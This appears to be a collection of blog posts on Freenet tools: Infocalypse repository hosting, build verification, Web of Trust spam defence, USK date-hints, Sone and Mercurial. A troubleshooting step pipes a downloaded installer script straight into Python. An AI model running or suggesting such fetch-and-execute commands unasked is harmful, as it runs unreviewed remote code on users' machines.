Welcome to the Infocalypse!

Example

This example shows how to share code over Freenet (using your Pseudonym instead of ArneBab).
# Create the repo
hg init life-repo
cd life-repo
echo "my" > life.txt
hg commit -Am "first steps"
cd ..

# Share the repo
hg clone life-repo freenet://ArneBab/life-repo

# Get a repo and add changes
hg clone freenet://ArneBab/life-repo real-life
cd real-life
echo "real" > life.txt
hg commit -m "getting serious"

# Share the repo and file a pull-request
hg clone . freenet://ArneBab/real-life
# the . stands for "the current folder"
hg fn-pull-request --wot ArneBab/life-repo # enter a message
cd ..

# Check for pull-requests and share the changes
cd life-repo
hg fn-check-notifications --wot ArneBab
hg pull -u freenet://ArneBab/real-life
hg push freenet://ArneBab/life-repo

Privacy Protections

Infocalypse takes your privacy seriously. When you clone a repository from freenet, your username for that repository is automatically set to “anonymous” and when you commit, the timezone is faked as UTC to avoid leaking your home country.

If you want to add more security to your commits, consider also using a fake time-of-day:

hg commit -m "Commit this sometime today" --date \
   "$(date -u "+%Y-%m-%d $(($RANDOM % 24)):$(($RANDOM % 60)):$(($RANDOM % 60)) +0000")"

Open path/to/repo-from-freenet/.hg/hgrc to set this permanently via an alias (just adapt the alias for rewriting the commit-date to UTC - these are already in the hgrc file if you cloned from Freenet).

Background Information

Let’s look at a few interesting steps in the example to highlight the strengths of Infocalypse, and provide an outlook with steps we already took to prepare Infocalypse for future development.

Efficient storage in Freenet

hg clone life-repo freenet://ArneBab/life-repo

Here we clone the local repository into Freenet. Infocalypse looks up the private key from the identity ArneBab. Then it creates two repositories in Freenet: <private key>/life-repo.R1/0 and <private key>/life-repo.R0/0. The URLS only differ in the R1 / R0: They both contain the same pointers to the actual data, and if one becomes inaccessible, the chances are good that the other still exists. Doubling them reduces the chance that they fall out and become inaccessible, which is crucial because they are the only part of your repository which does not have 100% redundancy. Also these pointers are the only part of the repository which only you can insert. As long as they stay available, others can reinsert the actual data to keep your repository accessible.

To make that easy, you can run the command hg fn-reinsert in a cloned repository. It provides 5 levels:

  • 1 - re-inserts the top key(s)
  • 2 - re-inserts the top keys(s), graphs(s) and the most recent update.
  • 3 - re-inserts the top keys(s), graphs(s) and all keys required to bootstrap the repo (default).
  • 4 - adds redundancy for big (>7Mb) updates.
  • 5 - re-inserts existing redundant big updates.
To reinsert everything you can insert, just run a tiny bash-loop:

for i in {1..5}; do hg fn-reinsert --level $i; done

Let’s get to that “actual data”. When uploading your data into Freenet, Infocalypse creates a bundle with all your changes and uploads it as a single file with a content-dependent key (a CHK). Others who know which data is in that bundle can always recreate it exactly from the repository.

When someone else uploads additional changes into Freenet, Infocalypse calculates the bundle for only the additional changes. This happens when you push:

hg push freenet://ArneBab/life-repo

To clone a repository, Infocalypse first downloads the file with pointers to the data, then downloads the bundles it needs (it walks the graph of available bundles and only gets the ones it needs) and reassembles the whole history by pulling it from the downloaded bundles.

hg clone freenet://ArneBab/life-repo real-life

By reusing the old bundles and only inserting the new data, Infocalypse minimizes the amount of data it has to transfer in and out of Freenet, and more importantly: Many repositories can share the same bundles, which provides automatic deduplication of content in Freenet. When you take into account that in Freenet often accessed content is faster and more reliable than seldomly accessed content, this gives Infocalypse a high degree of robustness and uses the capabilities of Freenet in an optimal way.

If you want to go into Infocalypse-specific commands, you can also clone a repository directly to your own keyspace without having to insert any actual data yourself:

hg fn-copy --requesturi USK@<other key>/<other reponame>.R1/N \
   --inserturi USK@<your key>/<your reponame>.R1/N

Pull requests via anonymous Freemail

Since the Google Summer of Code project from Steve Dougherty in 2013, Infocalypse supports sending pull-requests via Freemail, anonymous E-Mail over Freenet.

hg fn-pull-request --wot ArneBab/life-repo # enter a message
hg fn-check-notifications --wot ArneBab

This works by sending a Freemail to the owner of that repository which contains a YAML-encoded footer with the data about the repository to use.

You have to trust the owner of the other repository to send the pull-request, and the owner of the other repository has to trust you to receive the message. If the other does not trust you when you send the pull-request, you can change this by introducing your Pseudonym in the Web of Trust plugin (this means solving CAPTCHAs).

Convenience

To make key management easier, you can add the following into path/to/repo/.hg/hgrc

[paths]
default = freenet://ArneBab/life-repo
real-life = freenet://ArneBab/real-life

Now pull and push will by default go to freenet://ArneBab/life-repo and you can pull from the other repo via hg pull real-life.

Your keys are managed by the Web of Trust plugin in Freenet, so you can use the same freenet-uri for push and pull, and you can share the paths without having to take care that you don’t spill your private key.

DVCS WebUI

When looking for repositories with the command line interface, you are reliant on finding the addresses of repositories somewhere else. To ease that, Steve also implemented the DVCS WebUI for Freenet during his GSoC project. It provides a web interface via a Freenet plugin. In addition to providing a more colorful user interface, it could add 24/7 monitoring, walking remote repositories and pre-fetching of relevant data to minimize delays in the command line interface. It is still in rudimentary stages, though.

All the heavy lifting is done within the Infocalypse Mercurial plugin: Instead of implementing DVCS parsing itself, The DVCS WebUI asks you to connect Infocalypse so it can defer processing to that:

hg fn-connect

The longterm goal of the DVCS WebUI is to use provide a full-featured web interface for repository exploration. The current version provides the communication with the Mercurial plugin and lists the paths of locally known repositories.

You can get the DVCS WebUI from http://github.com/Thynix/plugin-Infocalypse-WebUI

Gitocalypse

If you prefer working with git, you can use gitocalypse written by SeekingFor to seamlessly use Infocalypse repositories as git remotes. Gitocalypse is available from https://github.com/SeekingFor/gitocalypse

The setup is explained in the README.

Troubleshooting

  • When I'm running "hg fn-setup" I get the error "abort: No module named fcp.node"
    Do you have pyFreenet installed? Also ensure that you installed it for python 2.
    wget bootstrap.pypa.io/ez_setup.py -O - | python2.7 - --user
    easy_install --user --egg Mercurial defusedxml PyYAML pyFreenet==0.4.0

Conclusion

Infocalypse provides hosting of repositories in Freenet with a level of convenience similar to GitHub or Bitbucket, but decentralized, anonymous and entirely built of Free Software.

You can leverage it to become independent from centralized hosting platforms for sharing your work and collaborating with other hackers.


  1. This guide shows the convenient way of working which has a higher barrier of entry. It uses WoT Pseudonyms to allow you to insert repositories by Pseudonym and repository name. If you can cope with inserting by private key and sending pull-requests manually, you can use it without the WoT, too, which reduces the setup effort quite a bit. Just skip the setup of the Web of Trust and Freemail and plugins. You can then clone the life repo via hg clone freenet://USK@6~ZDYdvAgMoUfG6M5Kwi7SQqyS-gTcyFeaNN1Pf3FvY,OSOT4OEeg4xyYnwcGECZUX6~lnmYrZsz05Km7G7bvOQ,AQACAAE/life-repo.R1/4 life-repo. See hg fn-genkey and hg help infocalypse for details. 

  2. Infocalypse shows one of many really interesting possibilities offered by Freenet. To get a feeling of how much more is possible, have a look at The Forgotten Cryptopunk Paradise

Reproducible build of Freenet do-it-yourself: verify-build demystified

You might know the reproducible-builds project, which tries to allow users to verify that what they install actually corresponds to the released source. Or GNU Guix, which provides transparent reproducible binaries — along with a challenge-function.

Given that Freenet is made for people with high expectations for integrity, it might not surprise you that Freenet has been providing a verifyable1 build and a verification script since 2012. However until release 1481, it was a hassle to set up, and few people used it.

But now that we’re on gradle, verifying that what I release is actually what’s tagged in the source is much easier than before.

The following instructions are for GNU/Linux, and maybe other *nixes, allowing you to verify the test release of 1482. You can easily adapt them for future releases.

preparation

Firstoff: to verify 1482 you NEED Java 7 - in general you need the Java version I release with. I hope that starting with 1483 it will be Java 8.

Update 2022: Now it’s Java 8.

get the release

Start by downloading the jar: SSK@…/jar-1482 (needs a running Freenet)

Copy it to /tmp/freenet-1482.jar

verify it

Then run the following:

failureWarning="FAILED TO VERIFY.
If you determine that this failure is not due to build environent differences,
then the source files used to build the published version of Freenet are 
different from the published source files. The build has been compromised.
Take care to only run version of Freenet with published, reviewable source code, 
as compromised versions of Freenet could easily contain back doors."

cd /tmp/
git clone git@github.com:freenet/fred.git
cd fred
git checkout build01482
./gradlew jar
mv build/libs/freenet.jar ../freenet-built.jar
cd ..

mkdir unpacked-built
unzip freenet-built.jar -d unpacked-built
(cd unpacked-built; find -type f) | sort > unpacked-built.list

mkdir unpacked-official
unzip freenet-1482.jar -d unpacked-official
(cd unpacked-official; find -type f) | sort > unpacked-official.list

if ! cmp unpacked-official.list unpacked-built.list; then
    echo FAILED TO VERIFY: Different files in official vs built
    echo Files in official but not in built are marked as +
    echo Files in built but not in official are marked with -
    diff -u unpacked-built.list unpacked-official.list
    echo ""
    echo "$failureWarning"
fi

while read x; do
    if ! cmp "unpacked-official/$x" "unpacked-built/$x"; then
        if [[ "$x" = "./META-INF/MANIFEST.MF" ]]; then
            echo "Manifest file is different; this is expected."
            echo "Please review the differences:"
            diff "unpacked-official/$x" "unpacked-built/$x"
        else
            echo "File is different: $x"
            echo "$x" >> "differences"
        fi
    fi
done < unpacked-official.list

if [[ -s "differences" ]]; then
    echo VERIFY FAILED: FILES ARE DIFFERENT:
    cat differences
    echo ""
    echo "$failureWarning"
fi

celebrate!

That’s it. You just verified release 1482 of Freenet. If that code does not shout a huge warning at you, then what I released is actually what is tagged and signed as 1482 in the source.

PS: This is a shorter and somewhat cleaned up version of the verify-build script.

PPS: Yes, there is also a docker solution. I cannot test it right now, though, because my docker does not work. Ask in IRC (#freenet on libera.chat).


  1. Since Java puts timestamps into class files and requires signing of jars, the jar is not byte-by-byte reproducible, but the verify-build script unpacks the jar and compares the class-files, ensuring that they only differ in timestamps and similar that do not affect functionality. 

Spread Freenet: A call for action

Freenet Logo: Follow the Rabbit “Daddy, where were you, when they took the freedom of the press away from the internet?” — Mike Godwin, Electronic Frontier Foundation

Reposted from Freetalk, the distributed pseudonymous forum in Freenet.

For all those among you, who use twitter, identi.ca[^identica], and/or other social networks this is a call to action.

Go to your social networking accounts and post about freenet. Tell us in 140 letters why freenet is your tool of choice, and remember to use the #freenet hashtag, so we can resend your posts!

I use freenet because we might soon need it as safe harbour to coordinate the fight against censorship → freenetproject.org

The broader story is the emerging concept of a right to freely exchange arbitrary data — Toad (former lead developer of freenet)

Background

There are still very many people out there who don’t know what freenet is. Just today a coder came into the #freenet IRC channel, asked what it did and learned that it already does everything he had thought about. And I still remember someone telling me “It would be cool if we had something like X-net from Cory Doctorow’s ‘Little Brother’” — he did not know that freenet already offers that with much improved security.

So we need to get the word out about freenet. And we have powerful words to choose from, beginning with Mike Godwin’s quote above but going much further. To just name a few buzz-words: Freenet is a crowdfunded distributed and censorship resistant freesoftware cloud publishing system. And different from info about corporate PR-powered projects, all these buzz words are true.

But to make us effective, we need to achieve critical mass. And to reach that, we need to coordinate and cross promote heavily.

Call to action

So I want to call to you to go to your social networking accounts and post about freenet. Tell us in 140 letters why freenet is your tool of choice, and remember to use the #freenet hashtag, so we can find and retweet your posts!

We can make a difference, if we fight together.

Additional info

Besides: My accounts are:

But no need to tell me your account. Just use your current social network of choice and remember to tell your friends to talk about freenet, too.

I hereby allow anyone to reuse this article in any form and under any license (up to the example tweets), so I can’t know who saw it here and who saw it elsewhere.

http://draketo.de/light/english/spread-freenet-a-call-to-action-on-twitter-and-identica

I hope I’ll soon see floods of entusiastic tweets about Freenet!

Some example tweets

I’ll gladly post and link yours here, if you allow it!

#Freenet: #crowdfunded distributed and censorship resistant #freesoftware cloud publishing → http://freenetproject.org — rightful buzz!

#imhappiestwhen when the internet is free. I hope it will remain so thanks to projects like #Freenet http://t.co/GMRXmDtGaming4JC

#freenet: freedom to publish that you may have to rely on, because censorship and ©ensorship are on the rise — Ixoliva

→ Install Freenet ←

Freenet

https://freenetproject.org

The Freenet Web of Trust keeps communication friendly with actual anonymity

In the past decade there hasn’t been a year without a politician calling for real names on the internet. Some even want to force people to use real photos as profile pictures. All in the name of stopping online hate, though enforcing real names has long been shown to actually make the problem worse.

This article presents another solution, one that has actually proven that it keeps communication friendly, even in the most anonymous environment of the fully decentralized Freenet project.

And that solution does work without enabling censorship and harassment (as requiring real names would).

History

The Web of Trust (WoT) was conceived when Frost, one of the older forums on Freenet, broke down due to intentional disruption: some people realized that full anonymity also allowed for automatic spamming without repercussions. For several months they drowned every board in spam, so people had to spend so much time ignoring spam that constructive communication mostly died.

Those spammers turned censorship resistance on its head and censored with spam. Similar to people who claim that free speech means that they have the right to shout down everyone who disagrees with them. Since the one central goal of Freenet is censorship resistance, something had to be done. The problem of Frost was that everyone could always write to everyone. Instead of going into an arms race of computing power or bandwidth, Freenet developers went to encode decentralized reputation into communication, focussed on stopping spam.

How it works

To make your messages visible to others, you have to be endorsed by someone they trust. When someone answers some of your messages without marking you as spammer, that means endorsement. To get initial visibility, you solve CAPTCHAs which makes you visible to a small number of people. This is similar to having moderators with a moderation queue, but users choose their own moderators.

If someone now starts spamming, users who see the messages mark them as spammer. To decide whose messages to see, users sum up all the endorsements (positive) and spam-marks (negative), weighted by their closeness in social interaction to the ones who gave them. If the total result is negative, the messages of the spammer are not even downloaded.

That method still provides full anonymity, but with accountability: you pay for misbehavior by losing visibility. This is the inverse of Chinese censorship: in China you get punished if your message reaches too many people. In Freenet you become invisible to the ones you annoy — and to those who trust them but not you (their own decision always wins).

But wait, does that actually work? Turns out that it does, because it punishes spammers by taking away visibility, the one currency spammers care about.

It is the one defence against spam which inherently scales better than spamming. And it keeps communication friendly.

Experience

Now I repeated the claim three times that the WoT keeps communications friendly (including the title). Let’s back it up. Why do I say that the WoT keeps communication friendly?

For the last decade, Freenet has been providing three discussion systems side by side. One is Frost, without Web of Trust. One is FMS, with user-selected moderators as Web of Trust. And the third is Sone, with propagating trust as Web of Trust. On Frost you see what happens without these systems. Insults fly high and the air is filled with hate and clogged by spam. Consequently it is very likely that FMS and Sone are a target of the same users. With no centralized way of banning someone, they face a harder challenge than most systems on the clearnet (though with much less financial incentive).

Yet discussions are friendly, constructive and often controversial. Anarchists, agorians, technocrats, democrats, LGBT activists and religious zealots discuss without going at each others throats.

And since this works in Freenet, where very different people clash without any fear of real-life repercussions, it can work everywhere.

Further reading

Use in other systems

How can this be applied to systems outside Freenet — for example federated microblogging like GNU social?

You can translate the required input to the Web of Trust as described in the scalability calculation to use information available in the federation:

  • As WoT identity, use the URL of a user on an instance. It is roughly controlled by that user.
  • As peer trust from Alice to Bob, use "if Alice follows Bob, use trust (100 - (100 / number of messages from Alice to Bob))".
  • As negative trust use a per-user blacklist (blocked users).
  • For initial visibility, just use visibility on the home instance.

These together reduce global moderation to moderation on a smaller instance and calculations based on existing social interaction.

If you want to get a feeling of how this works, install Freenet and FMS or Sone and just test it yourself. Both are Free Software and available to anyone:
freenetproject.org
FMS
Sone

(Finally typed down while listening to a podcast by techdirt about content moderation)

The Freenet social trust graph

Are trust relationships different in anonymous networks? This article should give you the tools to find out.

Update 2017: Now available from figshare with DOI 10.6084/m9.figshare.4725664

Update 2020: This data was used in Fuzzy Graph Modelling of Anonymous Networks (2018)!

Update 2020-11: Added graph of WoT under attack.

Recently we were asked in the #freenet IRC channel, whether we have a copy of the trust graph in the Web of Trust plugin (which provides service discovery and spam protection). While there is an easy way to get the non-spamming identities directly from the plugin (see wotutil), I decided to take the opportunity to do some Guile hacking: Crawling all the identities to dump a full copy of the trust graph. This also gives us IDs which are marked as spammers, and consequently ignored by the Web of Trust plugin.

So, firstoff, this is how the whole trust graph looks, about 13,000 identities and 250,000 trust relationships, with the size of the nodes showing the analyzed hub-value of the identities and the color showing the Eigenvector Centrality. Many of the nodes overlap, since the graph layouting in Gephi took hours to optimize it.

img

This is the 2020-11-01 graph, likely attackers in red, circles packed by hubbiness with Mike Bostock's Algorithm (also Gephi, but fast):

2020-11-01

I will not investigate all the details here. Instead, the files trust-deduplicated.csv and trust-sone.csv contain anonymized snapshots of the edges in the Web of Trust graph which can be loaded in common graph analysis tools. The first contains all trust values, the second only those which were set by the anonymous social network Sone, which indicates that the user saw at least one message of the other user.

An example of the investigations which can be done with this dataset is the following graph, where I let Gephi split the graph into communities using clustering analysis. The colors indicate the community, while the size of the nodes shows the hub-value and the color of the connections shows the betweenness. This uses the Reingold layout.

img

It’s already visible, that there are communities where the trust connection is realized by only a single node which trusts many others, but that there is also a well-connected center.

The identities in the csv files are given by an index in the list of identities instead of using their key to make it easy for researchers to use the data without having to fear that they might de-anonymize someone with correlation analysis or similar. The index-value depends on the identity files downloaded at

This dataset was created using the following scripts:

Simply execute them in order to get the file trust-anonymized.csv

(the most current version is available from notabug via Git from Bitbucket via Mercurial and from a static clone via Mercurial)

(to run the scripts, you need Guile 2.0.11 or later installed and Freenet running on port 8888. You might have to run them several times to retrieve seldomly accessed identities)

If you use this dataset, for example to investigate social interaction or the effects of anonymity, please drop me a note and reference the Freenet Project and me (Arne Babenhauserheide).

I release the csv files under cc by. If you use my Guile Scheme scripts (with the scm suffix) for research, I hereby grant the additional permission to use them under cc by, too. This should make it easy to comply with releasing your scripts and data as Open Access.

AnhangGröße
trust-deduplicated-force-atlas-hub-centrality.png1.37 MB
trust-sone-reingold.png953.21 KB
trust-sone.csv218.92 KB
trust-deduplicated.csv3.58 MB
crawl-wot.scm8.64 KB
parse-crawled.scm3.35 KB
anonymize-csv.scm3.18 KB
deduplicate-csv.scm1.35 KB
trust-anonymized-2020-11-01-under-attack.csv3.17 MB
attacking-nodes-2020-11-01.csv277 Bytes
2020-11-01-parse-crawled.scm3.35 KB
2020-11-01-crawl-wot.scm9.49 KB
2020-11-01-deduplicate-csv.scm1.35 KB
2020-11-01-anonymize-csv.scm3.47 KB
2020-11-01-graph-attackers-red-hubbiness-circle-pack.png894.42 KB

USK and Date-Hints: Finding the newest version of a site in Freenet's immutable datastore

Freenet provides a global, anonymous datastore where you can upload sites which then work like normal websites. But different from websites, they have a version-number.

The reason for this is, that you can only upload to a given key once1. This data then gets stored in the network and is effectively immutable (much like immutable data structures in functional programming).

In this model conflicts can arise from uploads of different users and from uploads of different versions of the site.

Avoid conflicts between users

So what if Alice uploads the file gpl.txt, and then Mallory tries to upload it again before users get the upload from Alice?

To avoid these conflicts between users, you can upload to an address defined by a key-pair. That key-pair has two keys, a public and a privat one. The URL of the site is derived from the public key. Everyone who has this URL can access the site. The private one allows uploading new data to the site. Only the owner of the private key can upload files to the site. This is the SSK: The Signed Subspace Key. It defines a space in Freenet which only you can update.

An SSK looks like this: SSK@[key]/[sitename]/[path/to/file]

Avoid conflicts between versions

But now what if Alice wants to upload a new version of gpl.txt - say GPLv3?

To avoid conflicts between different versions, each new version gets a unique identifier. The reason for using version numbers and not some other identifier is historical: To update sites despite not being able to rewrite published data, freenet users started to version their sites by simply appending a number to the name and then adding small images for future versions. If these images showed up, the new version existed.2

Most sites in freenet had a section like this (the images might take a bit to load - they are downloaded from a freenet outproxy):

technophob technophob-116technophob technophob-117technophob technophob-118technophob technophob-119

At some point, the freenet developers decided to integrate that function into freenet. They added a new key-type: The Updatable Subspace Key, in short: USK.

A USK looks like this: USK@[key]/[sitename]/[version]/[path/to/file]
(The difference to the SSK is that there is a path-element for the version).

If you enter a USK, freenet automatically checks for newer versions and then shows you the most recent version of the site.

As a practical example:

technophob
technophob

Note that this link will automatically get you to version 117 (or whatever version is the current one when you read this article), even though it has version 116 in its URL.

Internally the USK simply gets translated to an SSK in the form of SSK@[key]/[sitename]-[version]/[path/to/file]. You’ll surely recognize the scheme which is used here.

This is a prime example of demand-driven development: Users found a way to make sites dynamic with the activelink-hack. Then the Freenet developers added this as official feature. As nice side-effect, the activelink-images stayed with us as part of the Freenet Culture: Almost every site in freenet has a small logo with width and height 108x36 (pixels).

Date-Hints

USKs solved the problem of having updatable sites by checking some versions into the future. But they had a limitation: If your USK-Link was very old, freenet would have to check hundreds or even thousands of URLs to find the newest version. And this would naturally be very, very slow. Due to the distributed nature of Freenet, it is also not possible to just list all files under a given Key. You can only check for directories - the sitenames.

Also files in Freenet only stay available when people access them - but checking to see whether some file might still be accessible isn’t a defined problem: The data to that file could be on the computer of someone who is currently offline. When he or she comes online again, the file could suddenly be available, so determining whether a file does not exist isn’t actually possible.

A timeline of versions could look like this:

200920102011201220132014
1,2,34,567,8,9,10,11,12,13,141516,17,18

Now imagine that you find a link on a site which was added in 2010. It would for example link to version 4 of the site. If you access this site in 2014, freenet has to check versions 5,6,7,8...18 to find the most recent version. That requires 13 downloads - and for normal freesites the versions can be as high as 1200.

But remember that you can upload to arbitrary filenames. So what if the author of the site gave you a hint of the first version in 2014? With that, freenet would only have to start at version 16 - just 3 versions to check, and the hint.

Why the first? Remember that files cannot be overwritten, so the author cannot give you the most recent version in 2014.

And this is just what the freenet developers did: Date-Hints are simply files in freenet which contain the information about the most recent version of the site at some point in time.

The datehint keys look like this: SSK@[key]/[sitename]-DATEHINT-[year]

The file found at this key is a simple plain text file with content like the following:

HINT
46
2013-7-5

The first line is the identifier, the second is the most recent version at the time of insert (the first version in the year) and the last is the date of the upload of that version.

A yearly date-hint speeds up getting the most recent version a lot. But since sites in freenet have hundreds of versions rather then tens, it is a bit too coarse. It can still leave you with 20 or 30 possible new versions. So it actually provides additional date hints on a monthly, weekly and daily basis:

  • SSK@[key]/[sitename]-DATEHINT-[year]
  • SSK@[key]/[sitename]-DATEHINT-[year]-WEEK-[week]
  • SSK@[key]/[sitename]-DATEHINT-[year]-[month]
  • SSK@[key]/[sitename]-DATEHINT-[year]-[month]-[day]

If you give freenet a USK-link, it starts on the order of 10 requests: 4 date hints with the current date and requests for versions following the version in the link. Normally it gets a result in under 10 seconds.

The algorithmic cost should be 4 additional inserts per insert, and at least 4 fetches (current year, month, week, day) followed by N fetches (with N the uploads since the last found DATEHINT) to find the most recent version.

In case of strictly periodical uploads N should be capped at the number of uploads per day, or 7 (days per week) or 4 (weeks per month) or 12 (months per year), so Freenet would need to start at most 16 fetches to get the most recent version of a USK.

Conclusion

With USKs and Date-Hints Freenet implements updatable sites with acceptable performance in its anonymous datastore with effectively immutable data.

If you want to see it for yourself, come to freenetproject.org and install freenet. It’s free software and available for Windows, GNU/Linux and MacOSX.


  1. If you try to upload to a given key twice, you can get collisions. In that case, it isn’t clear which data a client will retrieve - similar to race conditions in threaded programs. That’s why we do not write to the same key twice in practice (though there is a key-type which can be used for passwords or simple file-names. It is called KSK and was the first key-type freenet provided. That led to wars on overwriting files like gpl.txt - similar to the edit-wars we nowadays get on Wikipedia, but with real anonymity thrown in ☺). 

AnhangGröße
technophob-activelink.png5.25 KB
freenet-logo.png2.26 KB

What can Freenet do well already?

From the #freenet IRC channel at freenode.net:

toad_1: what can freenet do well already?

  • sharing and retrieving files asynchronously, freemail, IRC2, publishing sites without need of a central server, sharing code repositories

  • I can simply go online, upload a file, send the key to a friend and go offline. the friend can then retrieve the file, even though I am already offline without needing a central server.

  • and nobody can eavesdrop.

  • it might be kinda slow, but it actually makes it easy to publish stuff: via jSite, floghelper and others.

  • floghelper is cool: spam-resistant anonymous blogging without central server

  • and freereader is, too (even though it needs lots of polish): forward RSS feeds into freenet

  • you can actually exchange passwords in a safe way via freemail: anonymous email with an integrated web-interface and imap access.

    • Justus and me coordinated the upload of the social networking site onto my FTP solely over freemail, and I did not have any fear of eavesdropping - different from any other mail I write.

… I think I should store this conversation somewhere

which I hereby did - I hope you enjoyed this little insight into the #freenet channel :)

And if you grew interested, why not install freenet yourself? It only takes a few clicks via webstart and you’re part of the censorship-resistant web.


  1. toad alias Matthew Toseland is the main developer of freenet. He tends to see more of the remaining challenges and fewer of the achievements than me - which is a pretty good trait for someone who builds a system to which we might have to entrust our basic right of free speech if the world goes on like this. From a PR perspective it is a pretty horrible trait, though, because he tends to forget to tell people what freenet can already do well :) 

  2. To setup the social networking features of Freenet, have a look at the social networking guide 

Wrapup: Make Sone scale - fast, anonymous, decentral microblogging over freenet

Sone1 allows fast, identi.ca-style microblogging in Freenet. This is my wrapup on a discussion on the steps to take until Sone can become an integral part of Freenet.

Current state

  • Is close to realtime.

  • Downloads all IDs and all their posts and replies → polling which won’t scale; short term local breakage.

  • Uploads all posts on every update → Can displace lots of content. Effective Size: X*M, X = revisions which did not drop out, M = total number of your messages. Long term self-DDoS of freenet.

Future

  • Is close to realtime for those you follow and your usual discussion group.

  • Uploads only recent posts directly and bundles older posts → much reduced storage need: Effective size: B * Z + Y*M; B = posts per bundle, Z = number of bundles which did not drop out, Y = numbers of not yet bundled messages; Z << Y, B << X, Y << X.

  • Downloads only the ones you follow + ones you get told about. Telling others means that you need to include info about people you follow, because you only get information from them.

Telling others about replies, options

  • Include all replies to anyone which I see in my own Sone → size rises massively, since you include all replies of all people you follow in your own Sone.

  • Include all IDs from which you saw replies along with the people they replied to → needs to poll more IDs. Optionally forward that info for several hops → for efficient routing it needs knowledge about the full follower topology, which is a privacy risk.

  • Discovering replies from people you don’t know yet: Add a WoT info: replies. Updated only when you reply to someone you did not reply to before. Poll people’s reply lists based on their WoT rating. Keep a list of people who answered one of your posts and poll these more often. Maybe poll people instantly who solve one of your captchas (your general captcha queue) → new users can enter quickly. When you solve captchas in WoT, preferably solve those from people you follow.
    → four ways to discover a reply:

    1. poll those you follow,
    2. poll the people who posted the latest replies to you (your usual discussion-group),
    3. poll those who solve one of your captchas (get new people in as fast as possible) and
    4. poll the replies-info from everyone with the polling frequency based on their WoT rating.

  1. You can find Sone in Freenet using the key USK@nwa8lHa271k2QvJ8aa0Ov7IHAV-DFOCFgmDt3X6BpCI,DuQSUZiI~agF8c-6tjsFFGuZ8eICrzWCILB60nT8KKo,AQACAAE/sone/38/ 

follow the blue rabbit

========= blue-rabbit =========
follow the blue rabbit
through the looking glass
to find your real self
========= looking glass =========

pyFreenet 0.4.1 with auto-spawn support in fcpupload

I just put up a new pyFreenet release (github):

If you have Python3 and pip >= 8 you can get it with pip3 install -U --user --egg pyFreenet3. It provides a cleaned up fcpupload script with --spawn support (requires GNU/Linux):

pip3 install -U --user --egg pyFreenet3
echo 1 > testfile
fcpupload --spawn --fcpPort 9486 testfile 

add -p 1 (high prio) and -e (realtime) for higher speed

It creates a Freenet node which listens at port 9486 (except if one already exists there), inserts the testfile, waits until the upload finishes, gives you a CHK link to the file and stops the node afterwards.

Also fcpupload now works again when used with a remote node.

This is tested by doublec, but still has rough edges (For example pip3 install can fail with error: option --single-version-externally-managed not recognized). But it works: people who have Java and Python3 installed on GNU/Linux can now upload files into Freenet without having to worry about Freenet at all — even without ever seeing it.

If you experience problems, please tell me on FMS (in Freenet) on GNU social or on twitter.

This article is also available on my Sharesite in Freenet: random_babcom: pyFreenet 0.4.1 with auto-spawn support in fcpupload

the zen of tolerance

  • You are entitled to voice your opinion.
  • You are not entitled to force it upon everyone.
  • You are not entitled to force it upon a subgroup repeatedly.
  • You are also not entitled to hurl hate towards participants, since that would disrupt communication.
  • If you cannot stay respectful and friendly after being asked to, I will unsee you and advise others to do the same with a clear and brief explanation, so they can take an informed decision.

I will use technical means to realize the zen of tolerance.

Tolerance for intolerance is self-defeating. Continuous disruption of communication is censorship.

Constant outrage disrupts communication. As does constant mocking.

This could also be called the paradox of free speech: your freedom of speech is worth as much as mine. It ends where it impedes on mine. And vice versa.

In Freenet, the decentralized FMS forums and the WebOfTrust plugin implement a technical method which can be used to realize this.

First published on random_babcom, my Freenet Sharesite.

“regarding B.S. like SOPA, PIPA, … freenet seems like a good idea after all!”

“Some years ago, I had a look at freenet and wasn't really convinced, now I'm back - a lot has changed, it grew bigger and insanely fast (in freenet terms), like it a lot, maybe this time I'll keep it. Especially regarding B.S. like SOPA, PIPA and other internet-crippling movements, freenet seems like a good idea after all!”
— sparky in Sone

So, if you know freenet and it did not work out for you in the past, it might be time to give it another try: freenetproject.org

This quote just grabbed me, and sparky gave me permission to cite it.

Freenet: WoT, database error, recovery patch

I just had a database error in WoT (the Freenet generic Web of Trust plugin) and couldn’t access one of my identities anymore (plus I didn’t have a backup of its private keys though it told me to keep backups – talk about carelessness :) ).

I asked p0s on IRC and he helped me patch together a WoT which doesn’t access the context for editing the ID (and in turn misses some functionality). This allowed me to regain my IDs private key and with that redownload my ID from freenet.

I didn’t want that patch rotting on my drive, so I uploaded it here: disable-context-checks-regain-keys.path

Applied to revision 4f84492d277e25618003e0e5a0cb14159a50535d of WoT staging.

Essentially it just comments out some stuff.

AnhangGröße
disable-context-checks-regain-keys.path3.79 KB

Mercurial

Mercurial is a distributed source control management tool.

Mercurial links:
- Mercurial Website.
- bitbucket.org - Easy repository publishing.
- Hg Init - A very nice Mercurial tutorial for newcomers.

With it you can save snapshots of your work on documents and go back to these at all times.

Also you can easily collaborate with other people and use Mercurial to merge your work.

Someone changes something in text file you also worked on? No problem. If you didn't work on the same line, you can simply let Mercurial do an automatic merge and your work will be joined. (If you worked on the same line you'll need to select how you want to merge these two changes).

It doesn't need a network connection for normal operation, except when you want to push your changes over the internet or pull changes of others from the web, so its commands are fast. The time to do a commit is barely noticeable which makes atomic commits easy to do.

And if you already know subversion, the switch to Mercurial will be mostly painless.

But its most important strength is not its speed. It is that Mercurial just works. No hassle with complicated setup. No arcane commands. Almost everything I ever wanted to do with it just worked out of the box, and that's a rare and precious feature today.

And to answer a common question:

“Once you have learned git well, what use is hg?” — Ross Bartlett in Why Mercurial?

  • Easier usage (with git I shot myself in the foot quite often. Mercurial just works),
  • Thoroughly planned features and user interface,
  • No need to think much about the tool. There is a reason why hg users tend to talk less about hg: There is no need to talk about it that much,
  • Accessing both hg and git repos from one ui via hg-git,
  • Versioned tags and the option to use persistent branches which make it easier to track later on, why a commit was added,
  • And many great extensions which for example enable much better scaling for huge repositories and distributed teams, along with easy paths to evolve.

I wish you much fun with Mercurial!

A complete Mercurial branching strategy

New version: draketo.de/software/mercurial-branching-strategy

This is a complete collaboration model for Mercurial. It shows you all the actions you may need to take, except for the basics already found in other tutorials like

Adaptions optimize the model for special needs like maintaining multiple releases1, grafting micro-releases and an explicit code review stage.

Summary: 3 simple rules

Any model to be used by people should consist of simple, consistent rules. Programming is complex enough without having to worry about elaborate branching directives. Therefore this model boils down to 3 simple rules:

3 simple rules:

(1) you do all the work on default2 - except for hotfixes.

(2) on stable you only do hotfixes, merges for release3 and tagging for release. Only maintainers4 touch stable.

(3) you can use arbitrary feature-branches5, as long as you don’t call them default or stable. They always start at default (since you do all the work on default).

Diagram

